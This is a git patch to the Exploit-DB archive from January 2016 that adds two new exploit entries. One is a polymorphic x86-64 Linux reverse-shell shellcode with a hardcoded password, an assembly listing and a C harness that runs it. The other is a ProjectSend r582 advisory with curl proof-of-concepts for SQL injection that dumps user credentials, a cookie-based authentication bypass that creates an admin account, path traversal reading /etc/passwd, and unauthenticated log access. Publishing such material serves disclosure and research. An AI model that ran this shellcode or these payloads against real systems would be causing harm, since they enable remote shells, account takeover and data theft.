From bf22eb1691d0649bd8d25b96f8089db54e18030e Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 30 Jan 2016 05:03:32 +0000
Subject: [PATCH] DB: 2016-01-30

2 new exploits
---
 files.csv                              |   3 +-
 platforms/lin_x86-64/shellcode/39383.c | 110 ++++++++++++++++++++
 platforms/php/webapps/39385.txt        | 133 +++++++++++++++++++++++++
 3 files changed, 245 insertions(+), 1 deletion(-)
 create mode 100755 platforms/lin_x86-64/shellcode/39383.c
 create mode 100755 platforms/php/webapps/39385.txt

diff --git a/files.csv b/files.csv
index 4b2f05acc..68e021d9c 100755
--- a/files.csv
+++ b/files.csv
@@ -32489,7 +32489,6 @@ id,file,description,date,author,platform,type,port
 36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site 'ty' Parameter SQL Injection Vulnerability",2011-08-08,darkTR,php,webapps,0
 36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server <= 4.0.2 NULL Pointer Dereference Remote Denial of Service Vulnerability",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0
 36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0
-36039,platforms/php/webapps/36039.txt,"Wordpress Theme Divi - Arbitrary File Download Vulnerability",2015-02-09,"pool and Fran_73",php,webapps,0
 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0
 36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80
 36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0
@@ -35624,3 +35623,5 @@ id,file,description,date,author,platform,type,port
 39380,platforms/osx/dos/39380.c,"OS X - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient Exploitable NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0
 39381,platforms/osx/dos/39381.c,"OS X - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0
 39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0
+39383,platforms/lin_x86-64/shellcode/39383.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
+39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80
diff --git a/platforms/lin_x86-64/shellcode/39383.c b/platforms/lin_x86-64/shellcode/39383.c
new file mode 100755
index 000000000..4a8f93c39
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39383.c
@@ -0,0 +1,110 @@
+/*---------------------------------------------------------------------------------------------------------------------
+/*
+*Title:            tcp reverse shell with password polymorphic version 122 bytes
+*Author:           Sathish kumar
+*Contact:          https://www.linkedin.com/in/sathish94
+*Copyright:        (c) 2016 iQube. (http://iQube.io)
+*Release Date:     January 29, 2016
+*Description:      x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
+*Tested On:        Ubuntu 14.04 LTS
+*SLAE64-1408
+*Build/Run:        gcc -fno-stack-protector -z execstack filename.c -o filename
+*                   ./bindshell
+*                   nc -l 4444 -vvv
+* 
+
+
+global _start
+
+_start:
+    
+    xor rax, rax    ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
+	xor rsi, rsi 
+	mul rsi
+	add rcx, 0x3       
+	push byte 0x2   ;pusing argument to the stack
+	pop rdi         ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
+	inc esi         ; already rsi is 0 so incrementing the rsi register will make it 1
+	push byte 0x29  ; pushing the syscall number into the rax by using stack
+	pop rax
+	syscall
+	
+	; copying the socket descripter from rax to rdi register so that we can use it further 
+
+	xchg rax, rdi
+	
+	; server.sin_family = AF_INET 
+	; server.sin_port = htons(PORT)
+	; server.sin_addr.s_addr = INADDR_ANY
+	; bzero(&server.sin_zero, 8)
+	; setting up the data sctructure
+	
+	xor rax, rax
+	push rax                         ; bzero(&server.sin_zero, 8)
+	mov ebx , 0xfeffff80             ; ip address 127.0.0.1 "noted" to remove null
+	not ebx
+	mov dword [rsp-4], ebx
+	sub rsp , 4                      ; adjust the stack
+	push word 0x5c11                 ; port 4444 in network byte order
+	push word 0x02                   ; AF_INET
+	push rsp
+	pop rsi
+	
+	
+	push 0x10
+	pop rdx
+	push 0x2a
+	pop rax
+	syscall
+	
+	push 0x3                           
+	pop rsi								; setting argument to 3 
+
+
+
+duplicate:
+    dec esi                            
+    mov al, 0x21                       ;duplicate syscall applied to error,output and input using loop
+    syscall
+    jne duplicate
+    
+password_check:
+	
+	push rsp
+	pop rsi
+	xor rax, rax   ; system read syscall value is 0 so rax is set to 0
+	syscall
+	push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
+	pop rax
+	lea rdi, [rel rsi]
+	scasd           ; comparing the user input and stored password in the stack
+	
+	
+    
+execve:                                      ; Execve format  , execve("/bin/sh", 0 , 0)
+     xor rsi , rsi
+     mul rsi                                 ; zeroed rax , rdx register 
+     push ax                                 ; terminate string with null
+     mov rbx , 0x68732f2f6e69622e            ; "/bin//sh"  in reverse order 
+     inc rbx
+     add rcx, 2
+     push rbx
+     push rsp
+     pop rdi                                 ; set RDI
+     push byte 0x3b                          ; execve syscall number (59)
+     pop rax
+     syscall
+
+*/
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] =\
+"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x48\x83\xc1\x03\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb\x80\xff\xff\xfe\xf7\xd3\x89\x5c\x24\xfc\x48\x83\xec\x04\x66\x68\x11\x5c\x66\x6a\x02\x54\x5e\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x54\x5e\x48\x31\xc0\x0f\x05\x68\x68\x61\x63\x6b\x58\x48\x8d\x3e\xaf\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2e\x62\x69\x6e\x2f\x2f\x73\x68\x48\xff\xc3\x48\x83\xc1\x02\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
+main()
+{
+   printf("Shellcode Length: %d\n", (int)strlen(code));
+   int (*ret)() = (int(*)())code;
+   ret();
+}
+
diff --git a/platforms/php/webapps/39385.txt b/platforms/php/webapps/39385.txt
new file mode 100755
index 000000000..acbb0eea2
--- /dev/null
+++ b/platforms/php/webapps/39385.txt
@@ -0,0 +1,133 @@
+Advisory ID:  SGMA-16001
+Title:  ProjectSend multiple vulnerabilities
+Product:  ProjectSend (previously cFTP)
+Version:  r582 and probably prior
+Vendor:  www.projectsend.org
+Vulnerability type:  SQL-injection, Auth bypass, Arbitrary File Access, Insecure Object Reference
+Risk level:  4 / 5
+Credit:  filippo.cavallarin@wearesegment.com
+CVE:  N/A
+Vendor notification:  2015-11-05
+Vendor fix:  N/A
+Public disclosure:  2016-01-29
+
+
+ProjectSend (previously cFTP) suffers from multiple vulnerabilities:
+
+
+- SQL Injection
+
+The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
+The following proof-of-concept demostrates this issue by downloading login credentials of registered users:
+
+curl -X POST 'http://projectsend.local/manage-files.php?client_id=1' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22' --data "status=10' and 0 union select 0,1 ,'0) or 1 union select 0,1,concat(user,char(32),password),3,4,5,6,7,8,9 from tbl_users -- a',3,4,5,6,'7"
+
+
+
+- SQL Injection
+
+The script manage-files.php suffers from a SQL-Injection vulnerability because the request parameter "files" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
+The following proof-of-concept demostrates this issue by injecting a SLEEP command into the database engine:
+
+curl -X POST 'http://projectsend.local/manage-files.php' --data 'files_actions=delete&do_action=&files%5B%5D=5) OR 1=sleep(10' -H 'Cookie: PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22'
+
+
+
+- SQL Injection
+
+The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "selected_clients" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
+There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 63.
+
+    $selected_clients = $_POST['selected_clients'];
+    $clients_to_get = mysql_real_escape_string(implode(',',array_unique($selected_clients)));
+    $sql_user = $database->query("SELECT id, name FROM tbl_users WHERE id IN ($clients_to_get)");
+
+
+
+- SQL Injection
+
+The script clients.php suffers from a SQL-Injection vulnerability because the request parameter "status" is used to build a sql query without beeing properly sanitized. In order to exploit this issue, an attaccker must be logged into the application as a non-privileged user.
+There is no POC available, but the vulnerability is easy to spot by looking at the source code at line 146.
+
+    $status_filter = $_POST['status'];
+    $cq .= " AND active='$status_filter'";
+    [...]
+    $sql = $database->query($cq);
+
+
+
+- SQL Injection
+
+The script process-zip-download.php suffers from a SQL-Injection vulnerability because the request parameter "file" is used to build a sql query without beeing properly sanitized.
+There is no POC available, but the vulnerability is easy to spot by looking at the source code.
+
+    $files_to_zip = explode(',',substr($_GET['file'], 0, -1));
+    [...]
+    foreach ($files_to_zip as $file_to_zip) {
+    [...]
+    $sql_url = $database->query('SELECT id, expires, expiry_date FROM tbl_files WHERE url="' . $file_to_zip .'"');
+
+
+
+- SQL Injection
+
+The script home-log.php suffers from a SQL-Injection vulnerability because the request parameter "action" is used to build a sql query without beeing properly sanitized.
+There is no POC available, but the vulnerability is easy to spot by looking at the source code.
+
+    $log_action = $_GET['action'];
+    $log_query = "SELECT * FROM tbl_actions_log";
+    if (!empty($log_action)) {
+        $log_query .= " WHERE action = '$log_action'";
+
+
+
+- Authentication Bypass
+
+An Authenticaton Bypass vulnerability has been discovered in multiple pages. By adding a cookie to request it is possible to bypass certain authentication checks and gain access to protected resources.
+The following proof-of-concepts are available:
+
+Lists all registered users:
+curl http://projectsend.local/users.php -H 'Cookie: userlevel=9'
+
+Add an Admin user to the database:
+curl http://projectsend.local/users-add.php -H 'Cookie: userlevel=9' -X POST --data 'add_user_form_name=necci&add_user_form_email=poplix@papuasia.org&add_user_form_level=9&add_user_form_user=necci&add_user_form_active=1&add_user_form_pass=123456'
+
+Read file statsictics:
+curl http://projectsend.local/home.php -H 'Cookie: userlevel=9'
+
+Read file details:
+curl http://projectsend.local/edit-file.php?file_id=1 -H 'Cookie: userlevel=9'
+
+Bypass authentication:
+curl  'http://projectsend.local/process-zip-download.php' -H 'Cookie: userlevel=8'
+
+
+- Arbitrary File Download
+
+The page process-zip-download.php fails to restrict access to local files. By injecting a path traversal vector into the "file" parameter it is possible to read an arbitrary file from the server.
+By combining this vulnerability with the Authentication Bypass affecting the same file, is possible for a non-authenticated user to gain access to protected data.
+The followinf proof-of-concept is available.
+
+curl  'http://projectsend.local/process-zip-download.php?file=../../../../../../../../etc/passwdd' -H 'Cookie: userlevel=8' > ttt.zip
+
+
+- Insecure Direct Object References
+
+The page actions.log.export.php fails to perform authentication checks so it's possible for anyone to access logs data.
+The followinf proof-of-concept is available.
+
+curl http://projectsend.local/includes/actions.log.export.php
+
+
+Solution
+No solution is available at the time of writing.
+The vendor has been contacted about three months before the public disclosure, but he stopped responding after we sent him our report.
+
+
+References
+https://www.wearesegment.com/research/Projectsend_multiple_vulnerabilities
+http://www.projectsend.org
+
+
+Filippo Cavallarin
+https://wearesegment.com
\ No newline at end of file